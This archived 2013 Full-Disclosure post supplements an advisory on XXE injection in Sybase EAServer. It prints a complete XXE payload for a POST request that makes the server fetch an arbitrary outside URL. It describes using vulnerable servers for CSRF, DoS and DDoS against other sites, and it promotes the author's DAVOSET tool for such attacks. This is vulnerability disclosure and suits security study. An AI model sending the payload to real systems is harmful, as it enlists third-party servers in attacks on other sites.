lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 11 Aug 2013 20:05:12 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XXE Injection in Sybase EAServer

Hello!

I'll give you additional information concerning advisory SEC Consult
SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer
(http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase
EAServer.

Among vulnerabilities in EAServer there is XXE Injection and it was only
mentioned about local file inclusion and directory listing attack vector.
But this XXE Injection vulnerability also allows to conduct attacks on other
sites. So I'll supplement SEC Consult's advisory and will bring your
attention to another attack vector.

I wrote about such attacks in my 2012's article "Using XML External Entities
(XXE) for attacks on other sites"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html)
and 2013's "Using XXE vulnerabilities for attacks on other sites"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html).
As I described in my articles, XXE vulnerabilities can be used for
conducting CSRF and DoS attacks on other sites (and at using multiple web
sites it's possible to conduct DDoS attacks). And last month I released a
tool for conducting such attacks - in DAVOSET v.1.1.2 I added support of XML
requests for XXE vulnerabilities.

XXE (WASC-43):

For the attack it's needed to send the next XML data in POST request.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://site/page">]>
<lol>
<dt>
<stringValue>&xxe;</stringValue>
<booleanValue>0</booleanValue>
</dt>
</lol>

So all servers with affected versions of Sybase EAServer can be used for
attacks on other sites via XXE.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists